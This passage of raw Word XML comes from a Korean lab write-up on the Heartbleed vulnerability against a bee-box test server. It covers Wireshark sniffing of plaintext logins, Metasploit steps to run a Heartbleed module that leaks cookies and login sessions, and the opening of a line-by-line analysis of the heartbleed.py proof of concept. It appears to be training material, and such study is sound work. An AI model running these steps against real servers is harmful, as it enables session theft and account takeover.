      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D88CC3D" w14:textId="030BAFE0" w:rsidR="008307E5" w:rsidRDefault="008307E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4162AF54" wp14:editId="021E52FE">
            <wp:extent cx="5664200" cy="2576830"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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709" cy="257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DFD64" w14:textId="35B2E0AF" w:rsidR="008307E5" w:rsidRDefault="008307E5"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결과값을 출력하는데,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>평문으로 로그인 내용이 출력된 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B02CF84" w14:textId="188A7292" w:rsidR="008307E5" w:rsidRDefault="008307E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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85048B" wp14:editId="60629D1C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4169476</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2458900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1395095" cy="598467"/>
                <wp:effectExtent l="19050" t="19050" r="14605" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="155" name="직사각형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095" cy="5984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D4D1D" id="직사각형 155" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:328.3pt;margin-top:193.6pt;width:109.85pt;height:47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20E9F97" wp14:editId="423215EA">
            <wp:extent cx="5664200" cy="3075305"/>
            <wp:effectExtent l="0" t="0" r="0" b="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685" cy="308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4A9E1" w14:textId="432174DD" w:rsidR="00D46CEB" w:rsidRDefault="008307E5"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 xml:space="preserve">작동시켜 뒀던 </w:t>
      </w:r>
      <w:r>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 패킷을 확인해보자.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">필터 </w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == [kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">] &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>beebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35105B97" w14:textId="55DB0CAA" w:rsidR="008307E5" w:rsidRDefault="008307E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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801E87" wp14:editId="167F7B37">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3088821</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>956442</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2593522" cy="729096"/>
                <wp:effectExtent l="19050" t="19050" r="16510" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="157" name="직사각형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522" cy="7290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FC047" id="직사각형 157" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:243.2pt;margin-top:75.3pt;width:204.2pt;height:5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1BB48F7" wp14:editId="33A6B237">
            <wp:extent cx="5664530" cy="2660015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985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068" cy="267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ACBDF" w14:textId="76225C6F" w:rsidR="008307E5" w:rsidRDefault="008307E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">해당 패킷을 더블클릭 </w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">혹은 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">statistics -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>commouniction</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -&gt; Limit to display filter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">체크 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-&gt; follow </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>stream )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2172F506" w14:textId="01A8977E" w:rsidR="008307E5" w:rsidRDefault="008307E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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2AE30E" wp14:editId="1D0FBB87">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>84364</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2529435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2688524" cy="154049"/>
                <wp:effectExtent l="19050" t="19050" r="17145" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="159" name="직사각형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524" cy="1540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B19FC" id="직사각형 159" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:6.65pt;margin-top:199.15pt;width:211.7pt;height:1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6A8F31C" wp14:editId="7F99F1D2">
            <wp:extent cx="5628904" cy="4622012"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620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78" cy="463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2AEF9" w14:textId="4F6B9670" w:rsidR="008307E5" w:rsidRDefault="008307E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">본래 </w:t>
      </w:r>
      <w:r>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 기능이라면 암호화되어야 하나,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>패킷이 평문으로 출력된 것을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C90E99C" w14:textId="48BFC640" w:rsidR="00B154D7" w:rsidRDefault="00B154D7"/>
    <w:p w14:paraId="0CF72227" w14:textId="65152B93" w:rsidR="00B154D7" w:rsidRDefault="00B154D7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>ali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>기능을 활용해서도 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EF25D0" w14:textId="0D128D04" w:rsidR="000C2945" w:rsidRDefault="000C2945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">과 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r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접속한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA5E51" w14:textId="4A52D039" w:rsidR="00B154D7" w:rsidRDefault="000C2945">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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FA554E" wp14:editId="4FDF05F1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>24988</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>55600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1270330" cy="432212"/>
                <wp:effectExtent l="19050" t="19050" r="25400" b="25400"/>
                <wp:wrapNone/>
                <wp:docPr id="75" name="직사각형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330" cy="4322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FD48E" id="직사각형 75" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:1.95pt;margin-top:4.4pt;width:100.05pt;height:3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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B154D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F6C638" wp14:editId="39F3C3BF">
            <wp:extent cx="5735781" cy="3324860"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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790" cy="332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B3B4E" w14:textId="2B5E223F" w:rsidR="00B154D7" w:rsidRDefault="000C2945">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하트블리드</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점용 페이로드를 검색</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498D2C8C" w14:textId="42AD0585" w:rsidR="000C2945" w:rsidRDefault="000C2945">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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995AEE" wp14:editId="57A93E04">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>24987</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>897816</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5787983" cy="296661"/>
                <wp:effectExtent l="19050" t="19050" r="22860" b="27305"/>
                <wp:wrapNone/>
                <wp:docPr id="76" name="직사각형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7983" cy="2966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CB14A" id="직사각형 76" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:1.95pt;margin-top:70.7pt;width:455.75pt;height:2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5F219C0" wp14:editId="12BD122C">
            <wp:extent cx="5795158" cy="1508125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385" cy="15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8DC36" w14:textId="2BE7BDE1" w:rsidR="000C2945" w:rsidRDefault="000C2945"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옵션 검색 후,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>필요한 부분을 넣어준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proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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서버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>이며,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> verbose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>는 자세한 내용 출력 옵션이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719AAF4A" w14:textId="75236DC4" w:rsidR="000C2945" w:rsidRDefault="000C2945">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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86AF94" wp14:editId="7A6ED8FA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>212651</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1606303</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2439142" cy="141918"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="78" name="직사각형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9142" cy="1419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1CC85" id="직사각형 78" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:16.75pt;margin-top:126.5pt;width:192.05pt;height:1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" filled="f" strokecolor="red" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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74C8B2" wp14:editId="0986FB77">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>214993</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1359123</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2439142" cy="141918"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="77" name="직사각형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9142" cy="1419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9B3AB" id="직사각형 77" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:16.95pt;margin-top:107pt;width:192.05pt;height:1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AB90316" wp14:editId="1A69B576">
            <wp:extent cx="6638290" cy="4334510"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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433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3D9D6" w14:textId="78EE585A" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="6D82FEDF" w14:textId="77777777" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="0F285FB4" w14:textId="77777777" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="7287C2B9" w14:textId="77777777" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="665D9546" w14:textId="6AB5F326" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="106EA1C3" w14:textId="77777777" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="63350FB1" w14:textId="67C36080" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="17B42032" w14:textId="77777777" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="67F99BD1" w14:textId="010070B6" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="6CA7DF4B" w14:textId="0320573F" w:rsidR="000C2945" w:rsidRDefault="000C2945">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007A9429" w14:textId="525E59EB" w:rsidR="000C2945" w:rsidRDefault="000C2945">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F22AD81" wp14:editId="6463304E">
            <wp:extent cx="6636365" cy="3467595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419" cy="347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F5B07" w14:textId="3285B6FA" w:rsidR="000C2945" w:rsidRDefault="000C2945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">하단부 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">leaked: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">부분을 보면 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cookies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>부분에서 로그인 세션 등을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68948ADB" w14:textId="08AC6324" w:rsidR="000C2945" w:rsidRDefault="000C2945">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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A75522" wp14:editId="4C410244">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>24988</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>487977</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6512378" cy="384711"/>
                <wp:effectExtent l="19050" t="19050" r="22225" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="79" name="직사각형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378" cy="3847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E67E3" id="직사각형 79" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:1.95pt;margin-top:38.4pt;width:512.8pt;height:3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5FB48F4" wp14:editId="7500D40D">
            <wp:extent cx="6638290" cy="1614805"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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1E26B" w14:textId="2EDC029E" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="495D44C2" w14:textId="1A23ACC2" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="65A73FA1" w14:textId="5C40E352" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="405DA6D7" w14:textId="63D66F14" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="34703E77" w14:textId="511919CB" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="4AFF7449" w14:textId="451CF1CE" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="02754B26" w14:textId="68D0A614" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="27802CBA" w14:textId="7B40B5C8" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="7C8AAE2B" w14:textId="6F4892D7" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="4E363F9C" w14:textId="1233271B" w:rsidR="000C2945" w:rsidRDefault="000C2945"/>
    <w:p w14:paraId="4F6FEBB5" w14:textId="77777777" w:rsidR="000C2945" w:rsidRPr="000C2945" w:rsidRDefault="000C2945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2784A" w14:paraId="234BF053" w14:textId="77777777" w:rsidTr="006E672C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="453527FD" w14:textId="52D2C2A3" w:rsidR="0062784A" w:rsidRPr="006E672C" w:rsidRDefault="000F6C68" w:rsidP="006E672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lastRenderedPageBreak/>
              <w:t xml:space="preserve">취약점 공격 스크립트 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="006E672C" w:rsidRPr="006E672C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r w:rsidR="006E672C" w:rsidRPr="006E672C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>eartbleed.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="006E672C" w:rsidRPr="006E672C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006E672C" w:rsidRPr="006E672C">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>소스코드 분석</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062784A" w14:paraId="0A753D8B" w14:textId="77777777" w:rsidTr="006E672C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="4A25D85A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proofErr w:type="gram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#!/</w:t>
            </w:r>
            <w:proofErr w:type="gram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usr/bin/python</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10CE542B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</w:p>
          <w:p w14:paraId="567FA919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import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A86F5C0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import </w:t>
            </w:r>
            <w:proofErr w:type="gram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struct</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="268EC681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import socket</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E62112A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import time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23394AFB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import </w:t>
            </w:r>
            <w:proofErr w:type="gram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select</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="67FE470A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import re</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F82BE4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from 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optparse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import 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OptionParser</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6BB89AD3" w14:textId="76ABF76C" w:rsid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</w:p>
          <w:p w14:paraId="3E3FD156" w14:textId="116C5E61" w:rsidR="005D23A0" w:rsidRDefault="005D23A0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 w:rsidRPr="005D23A0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#</w:t>
            </w:r>
            <w:r w:rsidRPr="005D23A0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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D23A0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optparse</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D23A0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는 명령 줄 옵션 분석 라이브러리이며,</w:t>
            </w:r>
            <w:r w:rsidRPr="005D23A0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</w:t>
            </w:r>
            <w:r w:rsidRPr="005D23A0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명령어 옵션 설명을 출력해준다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="056D589A" w14:textId="22A9C4BE" w:rsidR="00AA13FA" w:rsidRPr="005D23A0" w:rsidRDefault="00AA13FA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#</w:t>
            </w:r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%</w:t>
            </w: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p</w:t>
            </w:r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rog</w:t>
            </w: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는 현재 프로그램의 이름</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2418780E" w14:textId="702BB472" w:rsid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options = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gram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OptionParser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usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B668E8" w14:textId="0BE370EA" w:rsidR="005D23A0" w:rsidRDefault="005D23A0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</w:p>
          <w:p w14:paraId="2F6F7250" w14:textId="257526CA" w:rsidR="005D23A0" w:rsidRPr="00AA13FA" w:rsidRDefault="005D23A0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 w:rsidRPr="00AA13FA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#</w:t>
            </w:r>
            <w:r w:rsidR="00AA13FA" w:rsidRPr="00AA13FA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-p, --port, type, default</w:t>
            </w:r>
            <w:r w:rsidR="00AA13FA" w:rsidRPr="00AA13FA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옵션을 설정하고 옵션에 대한 간략한 요약인 </w:t>
            </w:r>
            <w:r w:rsidR="00AA13FA" w:rsidRPr="00AA13FA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help</w:t>
            </w:r>
            <w:r w:rsidR="00AA13FA" w:rsidRPr="00AA13FA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를 출력한다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59C27E09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options.add_</w:t>
            </w:r>
            <w:proofErr w:type="gram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option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'-p', '--port', type='int', default=8443, help='TCP port to test (default: 8443)')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="156A0E04" w14:textId="1B2E807F" w:rsid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</w:p>
          <w:p w14:paraId="62043F0F" w14:textId="57F401C2" w:rsidR="00AA13FA" w:rsidRDefault="00AA13FA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</w:p>
          <w:p w14:paraId="46F44B1D" w14:textId="32F2D354" w:rsidR="00AA13FA" w:rsidRPr="000E0C49" w:rsidRDefault="00AA13FA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70C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> h2bin</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">함수 </w:t>
            </w:r>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000E0C49">
              <w:rPr>
                <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체" w:hint="eastAsia"/>
                <w:color w:val="0070C0"/>
                <w:kern w:val="0"/>
